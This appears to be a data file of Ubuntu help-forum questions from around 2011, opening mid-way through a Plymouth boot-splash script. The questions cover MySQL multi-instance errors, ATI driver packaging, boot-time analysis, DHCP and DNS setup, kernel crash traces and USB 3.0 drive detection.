0.65 - progress_box.image.getheight ( ) / 2 + ( progress_box.image.getheight ( ) - progress_bar.original_image.getheight ( ) ) / 2 ; progress_bar.sprite.setposition ( progress_bar.x , progress_bar.y , 1 ) ; fun progress_callback ( duration , progress ) { if ( progress_bar.image.getwidth ( ) ! = math.int ( progress_bar.original_image.getwidth ( ) * progress ) ) { progress_bar.image = progress_bar.original_image.scale ( progress_bar.original_image.getwidth ( progress_bar.original_image ) * progress * 3 , progress_bar.original_image.getheight ( ) ) ; progress_bar.sprite.setimage ( progress_bar.image ) ; } } plymouth.setbootprogressfunction ( progress_callback ) ; # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - status update -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- num_scroll_lines = 5 ; line_width = 55 ; # width of one character char_width = 7 ; # height of one character char_height = 10 ; msg_color = [ 0.5,0.5,0.5 ] ; # msg_color is array fun update_status_callback ( sta ) { if ( sta == `` failed '' ) msg_color = [ 1,0,0 ] ; if ( sta == `` warning '' ) msg_color = [ 0.8,0.8,0 ] ; if ( sta == `` normal '' ) msg_color = [ 0.5,0.5,0.5 ] ; } fun stringlength ( string ) { index = 0 ; str = string ( string ) ; while ( str.charat ( index ) ) index++ ; return index ; } // initialising text images and their positions // 20 is the height ( including line spacing ) of each line for ( i=0 ; i < num_scroll_lines ; i++ ) { lines [ i ] = image.text ( `` '' ,0,0,0 ) ; message_sprite [ i ] = sprite ( ) ; message_sprite [ i ] .setx ( window.getx ( ) + ( screen_width / 2 ) - ( line_width * char_width / 2 ) ) ; message_sprite [ i ] .sety ( window.gety ( ) + ( screen_height / 2 ) + ( logo_height /2 ) + ( logo_height * 1.2 ) + ( i * char_height * 2 ) ) ; message_sprite [ i ] .setz ( 10000 ) ; } pretext = string ( `` '' ) ; fun scroll_message_callback ( text ) { nobreak = 0 ; if ( text.charat ( 0 ) == `` > '' ) { # `` no linebreak '' flag , like `` -n '' text = text.substring ( 1 , stringlength ( text ) ) ; # remove `` > '' at front nobreak = 1 ; } if ( pretext == `` '' ) { if ( nobreak == 1 ) pretext = text ; // truncate the message if too long if ( stringlength ( text ) > line_width ) { text = text.substring ( 0 , line_width - 3 ) ; text += `` ... '' ; } // shift messages one up for ( i = 0 ; i < num_scroll_lines - 1 ; i++ ) { lines [ i ] = lines [ i+1 ] ; } else { # the previous message was flagged to have no linebreak // truncate the message if too long if ( stringlength ( text ) > line_width - 5 ) { # leave min . 5 for pretext text = text.substring ( 0 , line_width - 8 ) ; text += `` ... '' ; } # truncate the previous message if too long if ( stringlength ( pretext ) > ( line_width - stringlength ( text ) ) ) { pretext = pretext.substring ( 0 , line_width - stringlength ( text ) - 3 ) ; pretext += `` ... '' ; } text = pretext + text ; if ( nobreak == 1 ) pretext = text ; else pretext = `` '' ; } // create the image for the latest message # original script had `` lines [ i ] '' lines [ i ] = image.text ( text , 0.5 , 0.5 , 0.5 ) ; // re-allocate the text images to sprites for ( i = 0 ; i < num_scroll_lines ; i++ ) { message_sprite [ i ] .setimage ( lines [ i ] ) ; } } plymouth.setupdatestatusfunction ( scroll_message_callback ) ; # messages get added to updates plymouth.setmessagefunction ( scroll_message_callback ) ; # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - quit -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- fun quit_callback ( ) { anim.sprite.setopacity ( 0 ) ; if ( plymouth.getmode ( ) == `` shutdown '' ) { motif.sprite.setopacity ( 0 ) ; } } plymouth.setquitfunction ( quit_callback ) ; ok so i have provided almost all the info needed , if anyone is familiar with this let me know what i am missing to get the boot messages through to plymouth . thanks
50759	problem running multiple mysql instances	i 'm trying to run multiple instance of mysql 5.1.49 on ubuntu 10.10 to setup a replication/backup database . i have added following line to /etc/mysql/my.cnf : [ mysqld2 ] server-id = 2 socket = /tmp/mysql2.sock port = 3308 pid-file = /var/lib/mysql2/mysql2.pid datadir = /var/lib/mysql2 log-error = /var/log/mysqld2/mysql2.log user = mysql also i have done : mkdir /var/lib/mysql2 chmod -r 777 /var/lib/mysql2 chown -r mysql : mysql /var/lib/mysql2 but when i run : /usr/bin/mysql_install_db -- datadir=/var/lib/mysql2 [ -- user=mysql ] as root or mysql user i get : 110627 17:04:17 [ warning ] ca n't create test file /var/lib/mysql2/david.lower-test 110627 17:04:17 [ warning ] ca n't create test file /var/lib/mysql2/david.lower-test installation of system tables failed ! examine the logs in /var/lib/mysql2 for more information . ... and when i run mysqld_multi -- verbose -- no-log start 2 i get : 110627 17:07:21 [ warning ] ca n't create test file /var/lib/mysql2/david.lower-test 110627 17:07:21 [ warning ] ca n't create test file /var/lib/mysql2/david.lower-test 110627 17:07:21 [ note ] plugin 'federated ' is disabled . /usr/sbin/mysqld : table 'mysql.plugin ' does n't exist 110627 17:07:21 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 110627 17:07:21 innodb : operating system error number 13 in a file operation . innodb : the error means mysqld does not have the access rights to innodb : the directory . innodb : file name ./ibdata1 innodb : file operation call : 'create ' . innodb : can not continue operation . only mysql dir is create inside /var/lib/mysql2/ . any idea ? ! thanks in advance .
50761	what is the .trash folder on the ntfs partitions ?	when using a dual-boot windows and ubuntu . i see that there is a folder created with the name .trash-1000 in the ntfs partitions . could someone explain to me : what does this folder mean ? for what it is used ? maybe trash related ? is it necessary to keep this folder ?
50763	i can´t download adobe flash	i can´t download adobe flash player , whenever i try it asks to pick an application . when i do i.e . ¨desktop¨ nothing happens .
50771	installing catalyst 11.6 for an ati hd 6970	ubuntu maverick 10.10 is displaying the desktop okay ( though limited to 1600x1200 ) after my having installed my new hd 6970 card , so i 'm now trying to install the proprietary driver ( i understand the open source one requires a more recent kernel than that in maverick ) . the proprietary driver under 'additional drivers ' resulted in a black screen on boot , so i deactivated and am trying to follow the manual install instructions at the cchtml ubuntu maverick installation guide . when i try to create the .deb packages with : sh ati-driver-installer-11-6-x86.x86_64.run -- buildpkg ubuntu/maverick i get : david @ skipper : ~/catalyst11.6 $ sh ati-driver-installer-11-6-x86.x86_64.run -- buildpkg ubuntu/maverick created directory fglrx-install.oln3ux verifying archive integrity ... all good . uncompressing ati catalyst ( tm ) proprietary driver-8.861 ... ... ... ... ... ... ... ... . ===================================================================== ati technologies catalyst ( tm ) proprietary driver installer/packager ===================================================================== generating package : ubuntu/maverick package build failed ! package build utility output : ./packages/ubuntu/ati-packager.sh : 396 : debclean : not found dpkg-buildpackage : export cflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export cppflags from dpkg-buildflags ( origin : vendor ) : dpkg-buildpackage : export cxxflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export fflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export ldflags from dpkg-buildflags ( origin : vendor ) : -wl , -bsymbolic-functions dpkg-buildpackage : source package fglrx-installer dpkg-buildpackage : source version 2:8.861-0ubuntu1 dpkg-buildpackage : source changed by ati technologies inc. < http : //ati.amd.com/support/driver.html > dpkg-source -- before-build fglrx.64vzxk dpkg-buildpackage : host architecture amd64 debian/rules build ca n't exec `` debian/rules '' : permission denied at /usr/bin/dpkg-buildpackage line 507. dpkg-buildpackage : error : debian/rules build failed with unknown exit code -1 cleaning in directory . /usr/bin/fakeroot : line 176 : debian/rules : permission denied debuild : fatal error at line 1319 : could n't exec fakeroot debian/rules : dpkg-buildpackage : export cflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export cppflags from dpkg-buildflags ( origin : vendor ) : dpkg-buildpackage : export cxxflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export fflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export ldflags from dpkg-buildflags ( origin : vendor ) : -wl , -bsymbolic-functions dpkg-buildpackage : source package fglrx-installer dpkg-buildpackage : source version 2:8.861-0ubuntu1 dpkg-buildpackage : source changed by ati technologies inc. < http : //ati.amd.com/support/driver.html > dpkg-source -- before-build fglrx.qemild dpkg-buildpackage : host architecture amd64 debian/rules build ca n't exec `` debian/rules '' : permission denied at /usr/bin/dpkg-buildpackage line 507. dpkg-buildpackage : error : debian/rules build failed with unknown exit code -1 cleaning in directory . ca n't exec `` debian/rules '' : permission denied at /usr/bin/debuild line 1314. debuild : fatal error at line 1313 : could n't exec debian/rules : permission denied dpkg-buildpackage : export cflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export cppflags from dpkg-buildflags ( origin : vendor ) : dpkg-buildpackage : export cxxflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export fflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export ldflags from dpkg-buildflags ( origin : vendor ) : -wl , -bsymbolic-functions dpkg-buildpackage : source package fglrx-installer dpkg-buildpackage : source version 2:8.861-0ubuntu1 dpkg-buildpackage : source changed by ati technologies inc. < http : //ati.amd.com/support/driver.html > dpkg-source -- before-build fglrx.xty6vc dpkg-buildpackage : host architecture amd64 debian/rules build ca n't exec `` debian/rules '' : permission denied at /usr/bin/dpkg-buildpackage line 507. dpkg-buildpackage : error : debian/rules build failed with unknown exit code -1 cleaning in directory . /usr/bin/fakeroot : line 176 : debian/rules : permission denied debuild : fatal error at line 1319 : could n't exec fakeroot debian/rules : dpkg-buildpackage : export cflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export cppflags from dpkg-buildflags ( origin : vendor ) : dpkg-buildpackage : export cxxflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export fflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export ldflags from dpkg-buildflags ( origin : vendor ) : -wl , -bsymbolic-functions dpkg-buildpackage : source package fglrx-installer dpkg-buildpackage : source version 2:8.861-0ubuntu1 dpkg-buildpackage : source changed by ati technologies inc. < http : //ati.amd.com/support/driver.html > dpkg-source -- before-build fglrx.oywici dpkg-buildpackage : host architecture amd64 debian/rules build ca n't exec `` debian/rules '' : permission denied at /usr/bin/dpkg-buildpackage line 507. dpkg-buildpackage : error : debian/rules build failed with unknown exit code -1 removing temporary directory : fglrx-install.oln3ux i 've installed devscripts which has debclean in it . i 've tried running the command with and without sudo . i 'm not experienced with installing from downloads/source , but it seems like the file debian/source is n't being set to be executable when it needs to be . if i extract only , without using the package builder command , debian/rules is 744 . as to what to do next , i 'm stumped . many thanks .
50775	can i edit my boot splash to any picture i want to ?	i want the very friendly looking old mac face . when i boot ubuntu i want this to come up instead of the purple screen as it is now . i 've heard of people doing this but can it be done ? i want a picture similar to this one , with the friendly face and all the icons . i 'm using 11.04 ubuntu .
50777	triple boot windows xp , ubuntu , & mac on acer z5g notebook	i 'm planning to install mac os x using these instructions http : //basshead.wordpress.com/2010/04/04/snow-leopard-on-acer-aspire-one-aoa150zg5/ on my acer z5g notebook i have windows xp & ubuntu 11.04 dual booting on it perfectly fine . my question is how do i make triple boot system ? what exactly do i need to do for this ? do i need to tweak grub for that ? i 'm going to create 30gb partition for mac os x . is it correct thing to do ? edit : i still couldnt get it done..but soon it will be working.for now follow http : //www.mydellmini.com/forum/dual-booting/14145-triple-boot-videos-guide-using-chameleon-os-x-windows-7-ubuntu-netbook-remix.html this link will ask u to install mac on 2nd partition but its not clearly mentioned how to do it.so check following . to install mac on ur sencond partition follow http : //osx.mechdrew.com/guides/macusb_dellmini10v.shtml i knw u will update to 10.6.8 and not 10.6.4 as told in the blog above ( thats what i did ) but after that it wont boot ( keeps on reebooting ) because kernel is not patched for 10.6.8 so follow these to patch the kernel : http : //prasys.info/2011/06/howto-macos-x-10-6-8-and-intel-atoms/ once i m done ill update this .
50778	how do i install kde 4.7 rc on kubuntu ?	i 'm interested in installing kde 4.7 on my laptop running kubuntu 11.04 , but when i go to the official page , all the links point me to the 4.6.90 page . does anyone know where i can find the 4.7 rc1 files and instructions ?
50779	can ndiswrapper be used for things other than wireless drivers ?	i have never used ndiswrapper for wireless drivers but i have used to get flash 32bit working on a 64bin system . my question is can it be used for other kinds of drivers for peripheral devices such as printers , mice or usb cameras , things of such nature . if if not why ?
50780	does using screenlets affect battery life on a notebook ?	i just read about screenlets . i was wondering if using screenlets will affect the battery life of my notebook ?
50781	chrome icon not appearing in launcher	i 've been using chromium for some time now , but i decided to switch over to chrome . more features . anyways , i found that when i launch chrome , its icon does n't appear in the launcher . do any of you have this problem , or is it just me ? i 'm running x86_64 version of natty and chrome 14.0.797.0 dev build .
50783	launchpad dailybuild source in subdirectory of branch	i have a repo branch that i have mirrored in launchpad that i am trying to setup a daily build . the problem is that the source directory of the package is a subdirectory in the branch . when building locally it 's no problem because i can just change to that directory . however with launchpad 's bzr-builder it does everything from the top directory in the branch . my current build recipe is : # bzr-builder format 0.3 deb-version { debupstream } - { revno } - { revno : packaging } lp : kegbot nest-part packaging lp : ~szechyjs/kegbot/kegbot_debian debian debian ideally i would use lp : kegbot/pykeg but this is not possible in bzr . is there a easy way i can build the package in the kegbot/pykeg directory , by setting it up in my recipe or some kind of source directory variable in the rules file ?
50787	how do i determine problems with bootup based on this bootchart ?	so i 've been having issues with lots of hard-drive usage during bootup and long bootup lately , and i installed bootchart to get these two bootcharts , but damn are there a lot of unfamiliar system stuff on there , it 's hard to tell what is a warning sign , and what is simply normal during boot . here is a bootchart with the advantage of a previously packed ? /cached ? boot : bootchart 1 here is the same bootchart without the advantage of a packed boot : bootchart 2 can anyone make suggestions on what this is telling me needs fixing ?
50790	compiz desktop wall edge bindings not working	i have set in the desktop wall plugin â bindings under gnome classic to use 'mouse 1 and left/right edge ' to change workplace , but that does not work . i have also set in 'command ' to use 'bottom right corner and mouse 1 ' to run nautilus -- no-desktop , but that also does not work . how can i do this ?
50793	bad sound on log-in to skype	every time i log in to skype i hear a bad sound on top of the log-in sound . ( i hear both bad sound and the log-in sound . ) this problem has existed since i made the full install , ( skype is in my post-install script ) . please help this is very annoying . i 've got this very strange error message when i typed skype -version another strange message when i typed skype skype version : 2.2.0.35
50797	maximal screen resolution for external monitor breaks desktop	whenever i 'm plugging in my external monitor into my notebook and changing the screen resolution to the maximum state , the desktop will get broken in a way : a third of the whole desktop space is not visible at all . i can see the whole panel as well as the unity side bar to the left , but the desktop space with all the windows in it is not completely visible . it 's blanked out . in case of opening the unity menu bar , i can type something in it . as soon as close the menu bar , the upper part stays visible and hangs : any ideas about that issue ?
50801	how can i rip my cds into apple lossless ( alac ) ?	i like to keep all my music in a lossless format , so i will never need to rip my cd collection again . i chose apple lossless because it 's a format that can be played directly on my ipod , without re-encoding . i am currently ripping cds using itunes on my windows partition . is there any ubuntu solution ?
50803	is it safer to purge ppas before upgrading to a new ubuntu release ?	i installed the ambiance evolution theme from a custom ppa , which overwrote the original ambiance . same for midori , flash and other apps . is it advisable to downgrade these packages to the ubuntu-provided versions before an upgrade ?
50807	how can i setup dhcpd ( dynamic dns ) ?	i have a ubuntu server 11.04 firewall/gateway set up and i 'm wondering how i can configure isc-dhcp-server to update bind9 to resolve hostnames in the network . here is my setup : 3 computers ( example ) : computer 1 's hostname : laptop computer 2 's hostname : desktop computer 3 's hostname : nas internal domain for all hosts : lan.example.com firewall/gateway ip : 192.168.1.1 how can i set up the dhcp and dns server so that laptop.lan.example.com , for example , will resolve correctly ? also , i 've been using webmin to set up other parts of the server , so is this possible to do with webmin ?
50814	optimize bootup sequence	i 'm on ubuntu 11.04 ( upgraded from 10.10 ) and suffering really high bootup times . it got so annoying , that i decided to dive into bootchart analysis myself . therefore i installed bootchart and restarted the system which generated this chart . however , i 'm not really experienced in reading such stuff . what causes the long bootup sequence ? edit : here is the output of hdparm -i /dev/sda : /dev/sda : model=samsung hd501lj , fwrev=cr100-12 , serialno=s0muj1eq102621 config= { fixed } rawchs=16383/16/63 , trksize=34902 , sectsize=554 , eccbytes=4 bufftype=dualportcache , buffsize=16384kb , maxmultsect=16 , multsect=16 curchs=16383/16/63 , cursects=16514064 , lba=yes , lbasects=976773168 iordy=on/off , tpio= { min:120 , w/iordy:120 } , tdma= { min:120 , rec:120 } pio modes : pio0 pio1 pio2 pio3 pio4 dma modes : mdma0 mdma1 mdma2 udma modes : udma0 udma1 udma2 udma3 udma4 udma5 *udma6 advancedpm=no writecache=enabled drive conforms to : unknown : ata/atapi-3,4,5,6,7 * signifies the current active mode and here the output of hdparm -tt /dev/sda /dev/sda : timing cached reads : 2410 mb in 2.00 seconds = 1205.26 mb/sec timing buffered disk reads : 258 mb in 3.02 seconds = 85.50 mb/sec
50815	see computer 's uptime and history	i was wondering if it is at all possible to find out when the computer was switched on , what files where accessed what folders were opened , what programs run and when the computer was resumed and put back to sleep ( just like in the movies ) . i know this is n't that important but it would be cool to know .
50821	downgrade ppa packages to versions available at a previous point in time	the backstory is that the normal intel gpu drivers do n't do the various opengl extensions that my hobby coding and some games want . so i have to install xorg-edgers and then its happy . however , last wednesday or so there was an update to xorg-edgers - lots of packages - and it broke badly ; the drivers lock up and take the whole computer with them ; hard reset required . so how can you downgrade - select package versions in a ppa that represent a point in the past , ignoring versions newer than that ?
50822	corrupted file problem	is there any way to decorrupt a file in ubuntu 11.04 ? i think the file might have got encrypted when i shutdown my system but did n't decrypt correctly when i started up . or , does ubuntu auto backup anywhere ? anything that might help me restore a lost file could help . the filesystem is ext4 . its only one file that not working correctly , and it stopped working after i had to manually shutdown my system .
50826	switcheroo or acpi call : which is the better option and what are the differences ?	i 'm running natty 64-bit on my acer timelinex 3820tg.this notebook has a switchable graphics card ( ati radeon hd5650 and intel chipset ) . currently i am not using the fglrx drivers . i am a little confused as to how or which way to switch between the cards . i have downloaded and compiled acpi_call and can load this with the following commands : sudo insmod acpi_call.ko test_off.sh this works well for switching to the intel chipset and giving me about 7 hours of battery life ( very sweet ) . however , that comes at a cost as i am not able to switch back to the ati gpu ( it causes my system to freeze and the only way to recover is reisub ) , which is required if i want to put the laptop into sleep mode . i recently read somewhere that switcheroo was actually made for the ati/intel cards so it raised a few questions for me which i hope someone can answer : what is the difference between switcheroo and acpi_call ? what are the advantages/disadvantage of the two solutions ? how exactly do i use switcheroo on natty ? -- if it 's built into the kernel , should n't it be automatic ?
50829	lots of internet browsing issues , all browsers	before the upgrade , everything was working fine . now , however , i can connect to the internet but a lot of stuff fails , and the weirdest thing is that it happens with firefox , chromium and opera . some of the things that fail : i ca n't log in to stack overflow , after entering user/pass it loads for a long time on firefox and throws error 408 ( browser request timed out ) on chromium and opera i ca n't log in to hotmail , similar symptoms i can login to facebook , but when i try to write a comment , or just post something in my wall , it stays loading for a long time , and then fails the first two issues seem to be related to secure pages , and the second one is another issue altogether , i believe . however , they all happen with all browsers , which is really weird . talking about weird : i connect using a huawei smartax mt 810 usb modem , which cost me blood and tears to get it working under ubuntu . i ordered an ethernet modem/router with my isp , and i 'm still waiting , but this issue intrigues me anyway . has anyone experienced this kind of problems ? i googled around , but could n't find a similar case .
50831	ensuring ethernet is configured before continuing init scripts	is there a better way to ensure that an ethernet port is configured before continuing through startup init scripts ? when 802.3ad bonded ethernet is configured on ubuntu , it takes some time before it finishes protocol negotiation and starts passing packets , because the networking script just configures , but does not verify that traffic is being passed . as a result , this can throw off some of the other network dependent scripts , like the init for drbd . right now , i just have a loop that pings the gateway in a startup script , but this seems less than optimal : gatewayip=10.0.0.1 while ( ! ping -c 1 $ gatewayip ) ; do echo gateway not up done
50833	invalid opcode 0000	at random times ( usually when watching a movie in xbmc ) , the computer locks up . i can still sometimes ssh in and get the 'dmesg ' output before that locks up too . a hard reboot is usually required to get things going again . i have cut out the date/time/server columns for easier reading , please do ask if these seem relevant omissions ... system : ubuntu 11.04 ( 2.6.38-8-server ) x64 x11 installed with icewm ( and xbmc ) core 2 duo e8400 @ 3.00ghz 8 gb ram asus p5q premium motherboard primary harddrive : ocz vertex 2 60 gb ( ssd ) other harddrives : various 750gb , 1tb , 1.5tb & 2tb ( wd & samsung ) any important information i am not supplying is purely a sign of my incompetence in these matters , so please do ask and excuse me for my inabilities ... invalid opcode : 0000 [ # 1 ] smp last sysfs file : /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map cpu 0 modules linked in : parport_pc ppdev vesafb snd_hda_codec_analog tuner_simple tuner_types wm8775 tda9887 tda8290 tea5767 tuner cx25840 ir_lirc_codec lirc_dev snd_hda_intel snd_hda_codec snd_hwdep snd_pcm ir_sony_decoder snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq rc_rc6_mce ivtv ir_jvc_decoder cx2341x i2c_algo_bit v4l2_common mceusb videodev ir_rc6_decoder ir_rc5_decoder snd_timer ir_nec_decoder nvidia ( p ) btusb bluetooth rc_core v4l2_compat_ioctl32 tveeprom snd_seq_device pata_marvell psmouse shpchp serio_raw snd asus_atk0110 soundcore snd_page_alloc lp parport firewire_ohci firewire_core crc_itu_t r8169 sky2 ahci libahci pid : 4597 , comm : xbmc.bin tainted : p 2.6.38-8-server # 42-ubuntu system manufacturer p5q premium/p5q premium rip : 0010 : [ < ffffffff8119bc4a > ] [ < ffffffff8119bc4a > ] do_mpage_readpage+0x9a/0x510 rsp : 0018 : ffff88021f5a59d8 eflags : 00210246 rax : 0000000000000020 rbx : ffff88021f5a5ac8 rcx : 0000000000000000 rdx : 0000000000000001 rsi : 0000000015e36fe0 rdi : 0000000000000000 rbp : ffff88021f5a5a98 r08 : ffff88021f5a5ac8 r09 : ffff88021f5a5b38 r10 : 0000000000000000 r11 : 0000000000000000 r12 : 0000000000000000 r13 : 000000000000b148 r14 : 0000000000000001 r15 : ffff8802067034b8 fs : 00007f3f34eb1700 ( 0000 ) gs : ffff8800cfc00000 ( 0000 ) knlgs:0000000000000000 cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 cr2 : 00007feb8d515000 cr3 : 000000021d744000 cr4 : 00000000000406f0 dr0 : 0000000000000000 dr1 : 0000000000000000 dr2 : 0000000000000000 dr3 : 0000000000000000 dr6 : 00000000ffff0ff0 dr7 : 0000000000000400 process xbmc.bin ( pid : 4597 , threadinfo ffff88021f5a4000 , task ffff88021f63db80 ) stack : ffff88021f5a5a28 ffffffff8116019d ffff88021f5a5b40 0000002000000003 ffff88021f5a5b38 ffff880206703370 ffffea0006d800f8 0000000000000000 ffffea0006d800f8 0000000c811270b5 ffff88021f5a5a68 ffffffff8110bdba call trace : [ < ffffffff8116019d > ] ? mem_cgroup_cache_charge+0xed/0x130 [ < ffffffff8110bdba > ] ? add_to_page_cache_locked+0xea/0x160 [ < ffffffff8119c232 > ] mpage_readpages+0x102/0x150 [ < ffffffff812063e0 > ] ? ext4_get_block+0x0/0x20 [ < ffffffff812063e0 > ] ? ext4_get_block+0x0/0x20 [ < ffffffff81149475 > ] ? alloc_pages_current+0xa5/0x110 [ < ffffffff8120157d > ] ext4_readpages+0x1d/0x20 [ < ffffffff81116a9b > ] __do_page_cache_readahead+0x14b/0x220 [ < ffffffff81116ed1 > ] ra_submit+0x21/0x30 [ < ffffffff81116ff5 > ] ondemand_readahead+0x115/0x230 [ < ffffffff811171a0 > ] page_cache_async_readahead+0x90/0xc0 [ < ffffffff8110b184 > ] ? file_read_actor+0xd4/0x170 [ < ffffffff812de72e > ] ? radix_tree_lookup_slot+0xe/0x10 [ < ffffffff8110c521 > ] do_generic_file_read.clone.23+0x271/0x450 [ < ffffffff8110d1ba > ] generic_file_aio_read+0x1ca/0x240 [ < ffffffff8100a82e > ] ? __switch_to+0x20e/0x2f0 [ < ffffffff81164c82 > ] do_sync_read+0xd2/0x110 [ < ffffffff8108b61c > ] ? hrtimer_try_to_cancel+0x4c/0xe0 [ < ffffffff81279083 > ] ? security_file_permission+0x93/0xb0 [ < ffffffff81164fa1 > ] ? rw_verify_area+0x61/0xf0 [ < ffffffff81165463 > ] vfs_read+0xc3/0x180 [ < ffffffff81165571 > ] sys_read+0x51/0x90 [ < ffffffff8100bfc2 > ] system_call_fastpath+0x16/0x1b code : ff ff 48 c7 85 78 ff ff ff 00 00 00 00 49 d3 ee b9 0c 00 00 00 2b 4d 8c 48 8b b2 c8 00 00 00 ba 01 00 00 00 41 0f af c6 49 d3 e5 < 0f > 36 4d 8c 4c 01 e8 d3 e2 4c 8d 44 16 ff 48 8b 53 20 49 d3 f8 rip [ < ffffffff8119bc4a > ] do_mpage_readpage+0x9a/0x510 rsp < ffff88021f5a59d8 > -- - [ end trace ac6cd2f4692205a3 ] -- - please note that the error is always occuring at do_mpage_readpage+0x9a/0x510 with the same numbers after it . i 've tried to come up with the possible meaning of these , but could n't get any further . i 've also noticed that the top block from the call trace is always the following with the exact same numbers : [ < ffffffff8116019d > ] ? mem_cgroup_cache_charge+0xed/0x130 [ < ffffffff8110bdba > ] ? add_to_page_cache_locked+0xea/0x160 [ < ffffffff8119c232 > ] mpage_readpages+0x102/0x150 [ < ffffffff812063e0 > ] ? ext4_get_block+0x0/0x20 [ < ffffffff812063e0 > ] ? ext4_get_block+0x0/0x20 could this indicate a hard drive issue , a ram issue or something else entirely ?
50834	how to get notfications of ppa updates ?	how can i get notified of updates to a certain ppa ? for example when i am interested in new package versions of a certain package in a certain ppa ? if a user has the package in question installed and is using the default desktop , she probably get notified via an icon in the traybar or something like that . but i am searching for a method which works even when the package is not installed ( and without gnome ) . it should be reliable and prompt . does launchpad provides some rss/atom-feed features for ppas ? or email notifications ? ( as a sidenote : i am surprised that even with my own ppa i only get an upload notification via mail - but no notification when the binary package is finished . )
50847	default permission of hosts file	i changed the permissions of my host file /etc/hosts by doing a chmod og+w . what 's the default permission so that i can switch it back ?
50852	firefox will hide after minimizing	i installed firefox 3.18 and created a new launcher and removed firefox 4 . when i try to minimize all the windows will hide and i ca n't find them . any solution ?
50855	prevent ctrl+alt+f4 from switching ttys	related : disable ctrl+alt+f4 switching to virtual terminal i would like to use ctrl+alt+f4 for a program instead of ubuntu 's ttys . the previous question , i saw suggested command xmodmap -pke | sed -n 's/ = .*vt_4 . */ = /p ' | xmodmap - which did not work for me . i ran it with alt+f2 .
50857	will all applications work fine on 64-bit ubuntu ?	i used ubuntu some time ago and now i want to switch on it again since community raised a lot and so did support for applications like wine . i remember that when 64bit version just came out many applications did n't work as they did on 32bit version . is it not better or still the same ? maybe they implemented something like wow in windows that simulates 32bit architecture and every possible app is working just fine . i am asking because i have lots of ram and i do n't want to sit on 3gb when i have 8 . also , i am somewhat of a programmer , but that is not a problem because if i write php i use netbeans on windows anyway , and it works on linux just as fine . but i also love to write c++/c # code . is it well supported ? i really like visual studio 2010 , it is very slick and has good auto completion , debugging and so on ... is there any ide on ubuntu that is similar to visual studio in terms of auto-completion , code formatting , gui designer , debugging ? i really hope you will answer me these questions because i really like to `` convert '' myself to ubuntu once and for all .
50865	ca n't play dvd with movie player	when i try to open a dvd with movie player , i get a message saying that a plugin is missing . it is n't specified what plugin is needed and when i click on the search button , no appropriate plugin is found . how do i determine what i need ? what is the best way to view dvds on ubuntu 11.04 ?
50866	external usb 3.0 hard drive is not recognised when plugged into usb 3 port	i have an iomega prestige portable external hard drive 1tb usb 3.0 . it works fine on windows 7 as a usb 3.0 drive . it is n't detected on ubuntu natty 64bit , 2.6.38-8-generic . fdisk -l can not see it at all : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x1bed746b device boot start end blocks id system /dev/sda1 1 1689 13560832 27 unknown /dev/sda2 * 1689 1702 102400 7 hpfs/ntfs /dev/sda3 1702 19978 146805760 7 hpfs/ntfs /dev/sda4 19978 60802 327914497 5 extended /dev/sda5 25555 60802 283120640 7 hpfs/ntfs /dev/sda6 19978 23909 31571968 83 linux /dev/sda7 23909 25555 13218816 82 linux swap / solaris partition table entries are not in disk order lsusb can see it : bus 003 device 003 : id 059b:0070 iomega corp . bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 004 : id 05fe:0011 chic technology corp. browser mouse bus 002 device 003 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0489 : e00f foxconn / hon hai bus 001 device 004 : id 0c45:64b5 microdia bus 001 device 003 : id 08ff:168f authentec , inc . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub and dmesg | grep -i xhci ( i may have unplugged the drive and plugged it back in again after booting ) : [ 1.659060 ] pci 0000:04:00.0 : xhci hw did not halt within 2000 usec status = 0x0 [ 11.484971 ] xhci_hcd 0000:04:00.0 : pci int a - > gsi 18 ( level , low ) - > irq 18 [ 11.484997 ] xhci_hcd 0000:04:00.0 : setting latency timer to 64 [ 11.485002 ] xhci_hcd 0000:04:00.0 : xhci host controller [ 11.485064 ] xhci_hcd 0000:04:00.0 : new usb bus registered , assigned bus number 3 [ 11.636149 ] xhci_hcd 0000:04:00.0 : irq 18 , io mem 0xc5400000 [ 11.636241 ] xhci_hcd 0000:04:00.0 : irq 43 for msi/msi-x [ 11.636246 ] xhci_hcd 0000:04:00.0 : irq 44 for msi/msi-x [ 11.636251 ] xhci_hcd 0000:04:00.0 : irq 45 for msi/msi-x [ 11.636256 ] xhci_hcd 0000:04:00.0 : irq 46 for msi/msi-x [ 11.636261 ] xhci_hcd 0000:04:00.0 : irq 47 for msi/msi-x [ 11.639654 ] xhci xhci_add_endpoint called for root hub [ 11.639655 ] xhci xhci_check_bandwidth called for root hub [ 11.956366 ] 